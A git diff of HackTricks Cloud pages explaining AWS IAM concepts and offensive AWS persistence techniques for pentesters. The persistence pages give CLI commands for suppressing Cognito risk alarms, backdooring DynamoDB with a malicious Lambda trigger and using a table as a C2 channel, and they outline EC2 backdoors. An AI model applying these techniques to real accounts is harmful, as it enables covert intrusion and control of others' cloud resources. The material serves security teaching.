+ +```javascript +{ + "Version": "2012-10-17", //Version of the policy + "Statement": [ //Main element, there can be more than 1 entry in this array + { + "Sid": "Stmt32894y234276923" //Unique identifier (optional) + "Effect": "Allow", //Allow or deny + "Action": [ //Actions that will be allowed or denied + "ec2:AttachVolume", + "ec2:DetachVolume" + ], + "Resource": [ //Resource the action and effect will be applied to + "arn:aws:ec2:*:*:volume/*", + "arn:aws:ec2:*:*:instance/*" + ], + "Condition": { //Optional element that allow to control when the permission will be effective + "ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"} + } + } + ] +} +``` + +The [global fields that can be used for conditions in any service are documented here](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\ +The [specific fields that can be used for conditions per service are documented here](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html). + +#### Inline Policies + +This kind of policies are **directly assigned** to a user, group or role. Then, they do not appear in the Policies list as any other one can use them.\ +Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity. + +#### Resource Bucket Policies + +These are **policies** that can be defined in **resources**. 
**Not all resources of AWS supports them**. + +If a principal does not have an explicit deny on them, and a resource policy grants them access, then they are allowed. + +### IAM Boundaries + +IAM boundaries can be used to **limit the permissions a user or role should have access to**. This way, even if a different set of permissions are granted to the user by a **different policy** the operation will **fail** if he tries to use them. + +A boundary is just a policy attached to a user which **indicates the maximum level of permissions the user or role can have**. So, **even if the user has Administrator access**, if the boundary indicates he can only read S· buckets, that's the maximum he can do. + +**This**, **SCPs** and **following the least privilege** principle are the ways to control that users doesn't have more permissions than the ones he needs. + +### Session Policies + +A session policy is a **policy set when a role is assumed** somehow. This will be like an **IAM boundary for that session**: This means that the session policy doesn't grant permissions but **restrict them to the ones indicated in the policy** (being the max permissions the ones the role has). + +This is useful for **security meassures**: When an admin is going to assume a very privileged role he could restrict the permission to only the ones indicated in the session policy in case the session gets compromised. + +```bash +aws sts assume-role \ + --role-arn \ + --role-session-name \ + [--policy-arns ] + [--policy ] +``` + +Note that by default **AWS might add session policies to sessions** that are going to be generated because of third reasons. 
For example, in [unauthenticated cognito assumed roles](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) by default (using enhanced authentication), AWS will generate **session credentials with a session policy** that limits the services that session can access [**to the following list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services). + +Therefore, if at some point you face the error "... because no session policy allows the ...", and the role has access to perform the action, it's because **there is a session policy preventing it**. + +### Identity Federation + +Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account.\ +An example of an identity provider can be your own corporate **Microsoft Active Directory** (via **SAML**) or **OpenID** services (like **Google**). Federated access will then allow the users within it to access AWS. + +To configure this trust, an **IAM Identity Provider is generated (SAML or OAuth)** that will **trust** the **other platform**. Then, at least one **IAM role is assigned (trusting) to the Identity Provider**. If a user from the trusted platform access AWS, he will be accessing as the mentioned role. + +However, you will usually want to give a **different role depending on the group of the user** in the third party platform. Then, several **IAM roles can trust** the third party Identity Provider and the third party platform will be the one allowing users to assume one role or the other. + +
+ +### IAM Identity Center + +AWS IAM Identity Center (successor to AWS Single Sign-On) expands the capabilities of AWS Identity and Access Management (IAM) to provide a **central plac**e that brings together **administration of users and their access to AWS** accounts and cloud applications. + +The login domain is going to be something like `.awsapps.com`. + +To login users, there are 3 identity sources that can be used: + +* Identity Center Directory: Regular AWS users +* Active Directory: Supports different connectors +* External Identity Provider: All users and groups come from an external Identity Provider (IdP) + +
+ +In the simplest case of Identity Center directory, the **Identity Center will have a list of users & groups** and will be able to **assign policies** to them to **any of the accounts** of the organization. + +In order to give access to a Identity Center user/group to an account a **SAML Identity Provider trusting the Identity Center will be created**, and a **role trusting the Identity Provider with the indicated policies will be created** in the destination account. + +#### AwsSSOInlinePolicy + +It's possible to **give permissions via inline policies to roles created via IAM Identity Center**. The roles created in the accounts being given **inline policies in AWS Identity Center** will have these permissions in an inline policy called **`AwsSSOInlinePolicy`**. + +Therefore, even if you see 2 roles with an inline policy called **`AwsSSOInlinePolicy`**, it **doesn't mean it has the same permissions**. + +### Cross Account Trusts and Roles + +**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only **having the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\ +It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust. + +### AWS Simple AD + +Not supported: + +* Trust Relations +* AD Admin Center +* Full PS API support +* AD Recycle Bin +* Group Managed Service Accounts +* Schema Extensions +* No Direct access to OS or Instances + +#### Web Federation or OpenID Authentication + +The app uses the AssumeRoleWithWebIdentity to create temporary credentials. 
However, this doesn't grant access to the AWS console, just access to resources within AWS. + +### Other IAM options + +* You can **set a password policy setting** options like minimum length and password requirements. +* You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**. + +AWS Identity and Access Management (IAM) provides **fine-grained access control** across all of AWS. With IAM, you can specify **who can access which services and resources**, and under which conditions. With IAM policies, you manage permissions to your workforce and systems to **ensure least-privilege permissions**. + +### IAM ID Prefixes + +In [**this page**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) you can find the **IAM ID prefixe**d of keys depending on their nature: + +| ABIA | [AWS STS service bearer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) | +| ---- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| ACCA | Context-specific credential | +| AGPA | User group | +| AIDA | IAM user | +| AIPA | Amazon EC2 instance profile | +| AKIA | Access key | +| ANPA | Managed policy | +| ANVA | Version in a managed policy | +| APKA | Public key | +| AROA | Role | +| ASCA | Certificate | +| ASIA | [Temporary (AWS STS) access key IDs](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) use this prefix, but are unique only in combination with the secret access key and the session token. 
| + +### Recommended permissions to audit accounts + +The following privileges grant various read access of metadata: + +* `arn:aws:iam::aws:policy/SecurityAudit` +* `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess` +* `codebuild:ListProjects` +* `config:Describe*` +* `cloudformation:ListStacks` +* `logs:DescribeMetricFilters` +* `directconnect:DescribeConnections` +* `dynamodb:ListTables` + +## Misc + +### CLI Authentication + +In order for a regular user authenticate to AWS via CLI you need to have **local credentials**. By default you can configure them **manually** in `~/.aws/credentials` or by **running** `aws configure`.\ +In that file you can have more than one profile, if **no profile** is specified using the **aws cli**, the one called **`[default]`** in that file will be used.\ +Example of credentials file with more than 1 profile: + +``` +[default] +aws_access_key_id = AKIA5ZDCUJHF83HDTYUT +aws_secret_access_key = uOcdhof683fbOUGFYEQug8fUGIf68greoihef + +[Admin] +aws_access_key_id = AKIA8YDCu7TGTR356SHYT +aws_secret_access_key = uOcdhof683fbOUGFYEQuR2EIHG34UY987g6ff7 +region = eu-west-2 +``` + +If you need to access **different AWS accounts** and your profile was given access to **assume a role inside those accounts**, you don't need to call manually STS every time (`aws sts assume-role --role-arn --role-session-name sessname`) and configure the credentials. + +You can use the `~/.aws/config` file to[ **indicate which roles to assume**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html), and then use the `--profile` param as usual (the `assume-role` will be performed in a transparent way for the user).\ +A config file example: + +``` +[profile acc2] +region=eu-west-2 +role_arn=arn:aws:iam:::role/ +role_session_name = +source_profile = +sts_regional_endpoints = regional +``` + +With this config file you can then use aws cli like: + +``` +aws --profile acc2 ... 
+``` + +If you are looking for something **similar** to this but for the **browser** you can check the **extension** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en). + +## References + +* [https://docs.aws.amazon.com/organizations/latest/userguide/orgs\_getting-started\_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html) +* [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/) +* [https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md b/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md new file mode 100644 index 0000000000..e4f155bd02 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md @@ -0,0 +1,155 @@ +# AWS - Federation Abuse + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## SAML + +For info about SAML please check: + +{% embed url="https://book.hacktricks.xyz/pentesting-web/saml-attacks" %} + +In order to configure an **Identity Federation through SAML** you just need to provide a **name** and the **metadata XML** containing all the SAML configuration (**endpoints**, **certificate** with public key) + +## OIDC - Github Actions Abuse + +In order to add a github action as Identity provider: + +1. For _Provider type_, select **OpenID Connect**. +2. For _Provider URL_, enter `https://token.actions.githubusercontent.com` +3. Click on _Get thumbprint_ to get the thumbprint of the provider +4. For _Audience_, enter `sts.amazonaws.com` +5. Create a **new role** with the **permissions** the github action need and a **trust policy** that trust the provider like: + * ```json + { + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com" + }, + "Action": "sts:AssumeRoleWithWebIdentity", + "Condition": { + "StringEquals": { + "token.actions.githubusercontent.com:sub": [ + "repo:ORG_OR_USER_NAME/REPOSITORY:pull_request", + "repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main" + ], + "token.actions.githubusercontent.com:aud": "sts.amazonaws.com" + } + } + } + ] + } + ``` +6. Note in the previous policy how only a **branch** from **repository** of an **organization** was authorized with a specific **trigger**. +7. The **ARN** of the **role** the github action is going to be able to **impersonate** is going to be the "secret" the github action needs to know, so **store** it inside a **secret** inside an **environment**. +8. 
Finally use a github action to configure the AWS creds to be used by the workflow: + +```yaml +name: 'test AWS Access' + +# The workflow should only trigger on pull requests to the main branch +on: + pull_request: + branches: + - main + +# Required to get the ID Token that will be used for OIDC +permissions: + id-token: write + contents: read # needed for private repos to checkout + +jobs: + aws: + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v3 + + - name: Configure AWS Credentials + uses: aws-actions/configure-aws-credentials@v1 + with: + aws-region: eu-west-1 + role-to-assume: ${{ secrets.READ_ROLE }} + role-session-name: OIDCSession + + - run: aws sts get-caller-identity + shell: bash +``` + +## OIDC - EKS Abuse + +```bash +# Crate an EKS cluster (~10min) +eksctl create cluster --name demo --fargate +``` + +```bash +# Create an Identity Provider for an EKS cluster +eksctl utils associate-iam-oidc-provider --cluster Testing --approve +``` + +It's possible to generate **OIDC providers** in an **EKS** cluster simply by setting the **OIDC URL** of the cluster as a **new Open ID Identity provider**. This is a common default policy: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B" + }, + "Action": "sts:AssumeRoleWithWebIdentity", + "Condition": { + "StringEquals": { + "oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com" + } + } + } + ] +} +``` + +This policy is correctly indicating than **only** the **EKS cluster** with **id** `20C159CDF6F2349B68846BEC03BE031B` can assume the role. However, it's not indicting which service account can assume it, which means that A**NY service account with a web identity token** is going to be **able to assume** the role. 
+ +In order to specify **which service account should be able to assume the role,** it's needed to specify a **condition** where the **service account name is specified**, such as: + +{% code overflow="wrap" %} +```bash +"oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account", +``` +{% endcode %} + +## References + +* [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md new file mode 100644 index 0000000000..cfa7c3df4f --- /dev/null +++ b/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md @@ -0,0 +1,35 @@ +# AWS - Permissions for a Pentest + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools: + +* The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/README.md b/pentesting-cloud/aws-security/aws-persistence/README.md new file mode 100644 index 0000000000..901051f090 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/README.md @@ -0,0 +1,2 @@ +# AWS - Persistence + diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md new file mode 100644 index 0000000000..eeeaca42b9 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md @@ -0,0 +1,58 @@ +# AWS - API Gateway Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## API Gateway + +For more information go to: + +{% content-ref url="../aws-services/aws-api-gateway-enum.md" %} +[aws-api-gateway-enum.md](../aws-services/aws-api-gateway-enum.md) +{% endcontent-ref %} + +### Resource Policy + +Modify the resource policy of the API gateway(s) to grant yourself access to them + +### Modify Lambda Authorizers + +Modify the code of lambda authorizers to grant yourself access to all the endpoints.\ +Or just remove the use of the authorizer. + +### IAM Permissions + +If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\ +Or just remove the use of the authorizer. + +### API Keys + +If API keys are used, you could leak them to maintain persistence or even create new ones.\ +Or just remove the use of API keys. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md new file mode 100644 index 0000000000..ce324c3a2b --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md @@ -0,0 +1,70 @@ +# AWS - Cognito Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Cognito + +For more information, access: + +{% content-ref url="../aws-services/aws-cognito-enum/" %} +[aws-cognito-enum](../aws-services/aws-cognito-enum/) +{% endcontent-ref %} + +### User persistence + +Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like: + +* **Adding a User Pool** controlled by the user to an Identity Pool +* Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow** + * Or to an **authenticated Identity Pool** if the attacker can login + * Or **improve the permissions** of the given roles +* **Create, verify & privesc** via attributes controlled users or new users in a **User Pool** +* **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool + +Check how to do these actions in + +{% content-ref url="../aws-privilege-escalation/aws-cognito-privesc.md" %} +[aws-cognito-privesc.md](../aws-privilege-escalation/aws-cognito-privesc.md) +{% endcontent-ref %} + +### `cognito-idp:SetRiskConfiguration` + +An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options: + +{% code overflow="wrap" %} +```bash +aws cognito-idp set-risk-configuration --user-pool-id --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION} +``` +{% endcode %} + +By default this is disabled: + +
+ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md new file mode 100644 index 0000000000..c8ddc156ec --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md @@ -0,0 +1,91 @@ +# AWS - DynamoDB Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### DynamoDB + +For more information access: + +{% content-ref url="../aws-services/aws-dynamodb-enum.md" %} +[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md) +{% endcontent-ref %} + +### DynamoDB Triggers with Lambda Backdoor + +Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account. + +{% code overflow="wrap" %} +```bash +# Create a malicious Lambda function +aws lambda create-function \ + --function-name MaliciousFunction \ + --runtime nodejs14.x \ + --role \ + --handler index.handler \ + --zip-file fileb://malicious_function.zip \ + --region + +# Associate the Lambda function with the DynamoDB table as a trigger +aws dynamodbstreams describe-stream \ + --table-name TargetTable \ + --region + +# Note the "StreamArn" from the output +aws lambda create-event-source-mapping \ + --function-name MaliciousFunction \ + --event-source \ + --region +``` +{% endcode %} + +To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function. + +### DynamoDB as a C2 Channel + +An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands. 
+ +```bash +# Create a DynamoDB table for C2 +aws dynamodb create-table \ + --table-name C2Table \ + --attribute-definitions AttributeName=CommandId,AttributeType=S \ + --key-schema AttributeName=CommandId,KeyType=HASH \ + --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ + --region + +# Insert a command into the table +aws dynamodb put-item \ + --table-name C2Table \ + --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \ + --region +``` + +The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md new file mode 100644 index 0000000000..e2f500bf06 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md @@ -0,0 +1,80 @@ +# AWS - EC2 Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## EC2 + +For more information check: + +{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} +[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) +{% endcontent-ref %} + +### Security Group Connection Tracking Persistence + +If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic. + +If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.** + +### EC2 Lifecycle Manager + +This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\ +An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**. + +### Scheduled Instances + +It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access. + +### Spot Fleet Request + +Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**. 
+ +### Backdoor Instances + +An attacker could get access to the instances and backdoor them: + +* Using a traditional **rootkit** for example +* Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md)) +* Backdooring the **User Data** + +### **Backdoor Launch Configuration** + +* Backdoor the used AMI +* Backdoor the User Data +* Backdoor the Key Pair + +### VPN + +Create a VPN so the attacker will be able to connect directly through i to the VPC. + +### VPC Peering + +Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
